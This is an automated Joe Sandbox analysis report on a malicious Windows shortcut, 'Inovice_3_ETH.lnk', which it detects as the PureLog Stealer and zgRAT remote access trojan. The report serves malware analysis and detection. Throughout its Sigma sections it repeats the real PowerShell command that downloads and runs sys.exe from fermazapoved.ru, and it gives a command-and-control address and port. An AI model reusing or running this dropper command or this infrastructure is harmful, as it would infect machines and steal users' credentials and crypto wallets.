Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Inovice_3_ETH.lnk

Overview

General Information

Sample name:Inovice_3_ETH.lnk
Analysis ID:1493062
MD5:38d714fc636803994a6cb45f41b7e88e
SHA1:141b8a2e75ee543aae9247829df050259388310d
SHA256:73e70efc9e44e21f50e8586cc917d4751959021c3eba73921ff8c1ca01b933de
Infos:

Detection

PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
Contains functionality to capture screen (.Net source)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows shortcut file (LNK) contains suspicious command line arguments
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svhosts.exe (PID: 7548 cmdline: "C:\Users\user\AppData\Roaming\svhosts.exe" MD5: BD46789E8C6F46CC2D00FEA7E89F1F6F)
      • powershell.exe (PID: 7976 cmdline: "powershell" Start-Sleep -Seconds 10; Remove-Item -Path 'C:\Users\user\AppData\Roaming\svhosts.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_zgRATDetects zgRATditekSHen
      • 0x3d14e:$s1: file:///
      • 0x3d05c:$s2: {11111-22222-10009-11112}
      • 0x3d0de:$s3: {11111-22222-50001-00000}
      • 0x3b325:$s4: get_Module
      • 0x3b63f:$s5: Reverse
      • 0x36352:$s6: BlockCopy
      • 0x3632c:$s7: ReadByte
      • 0x3d160:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
      00000002.00000002.2067785237.0000000000FD0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000002.00000002.2265623390.000000001B280000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Click to see the 5 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          2.2.svhosts.exe.fd0000.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            2.2.svhosts.exe.1b280000.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              2.2.svhosts.exe.1bd80000.5.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                2.2.svhosts.exe.1bd80000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  2.2.svhosts.exe.1bd80000.5.raw.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                  • 0x3d14e:$s1: file:///
                  • 0x3d05c:$s2: {11111-22222-10009-11112}
                  • 0x3d0de:$s3: {11111-22222-50001-00000}
                  • 0x3b325:$s4: get_Module
                  • 0x3b63f:$s5: Reverse
                  • 0x36352:$s6: BlockCopy
                  • 0x3632c:$s7: ReadByte
                  • 0x3d160:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                  Click to see the 3 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_7332.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: PowerShell DownloadFile
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7332, TargetFilename: C:\Users\user\AppData\Roaming\svhosts.exe
                    Sigma detected: PowerShell Download Pattern
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe
                    Sigma detected: PowerShell Web Download
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe
                    Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Powershell download and execute file
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe

                    Suricata Signatures

                    Timestamp:2024-08-14T22:23:43.724101+0200
                    SID:2019714
                    Severity:2
                    Source Port:49730
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-08-14T22:23:52.582344+0200
                    SID:2857864
                    Severity:1
                    Source Port:49732
                    Destination Port:7702
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-14T22:23:45.030899+0200
                    SID:2019714
                    Severity:2
                    Source Port:49731
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: Inovice_3_ETH.lnkAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeReversingLabs: Detection: 83%
                    Multi AV Scanner detection for submitted file
                    Source: Inovice_3_ETH.lnkReversingLabs: Detection: 70%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: Inovice_3_ETH.lnkJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA1E730 CryptUnprotectData,2_2_00007FFD9BA1E730
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA1E718 CryptUnprotectData,2_2_00007FFD9BA1E718
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA22D15 CryptUnprotectData,2_2_00007FFD9BA22D15
                    Source: unknownHTTPS traffic detected: 62.173.145.78:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: Binary string: costura.dotnetzip.pdb.compressed source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: costura.dotnetzip.pdb.compressed source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: svhosts.exe, 00000002.00000002.2290132290.000000001C350000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: costura.dotnetzip.pdb.compressed8 source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2857864 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.4:49732 -> 188.130.138.23:7702
                    Source: global trafficTCP traffic: 192.168.2.4:49732 -> 188.130.138.23:7702
                    Source: global trafficHTTP traffic detected: GET /images/sys.exe HTTP/1.1Host: fermazapoved.ruConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /images/sys.exe HTTP/1.1Host: fermazapoved.ruConnection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: ASKONTELRU ASKONTELRU
                    Source: Joe Sandbox ViewASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49730 -> 62.173.145.78:80
                    Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49731 -> 62.173.145.78:443
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                    Source: global trafficHTTP traffic detected: GET /images/sys.exe HTTP/1.1Host: fermazapoved.ruConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /images/sys.exe HTTP/1.1Host: fermazapoved.ruConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: fermazapoved.ru
                    Source: global trafficDNS traffic detected: DNS query: 174.109.0.0.in-addr.arpa
                    Source: cert9.db.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: cert9.db.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: cert9.db.2.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: cert9.db.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: cert9.db.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: cert9.db.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: cert9.db.2.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: powershell.exe, 00000000.00000002.1746913988.000001F3D9527000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746913988.000001F3D9522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746913988.000001F3D9541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746913988.000001F3D9079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fermazapoved.ru
                    Source: powershell.exe, 00000000.00000002.1746913988.000001F3D95FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746913988.000001F3D8143000.00000004.00000800.00020000.00000000.sdmp, Inovice_3_ETH.lnkString found in binary or memory: http://fermazapoved.ru/images/sys.exe
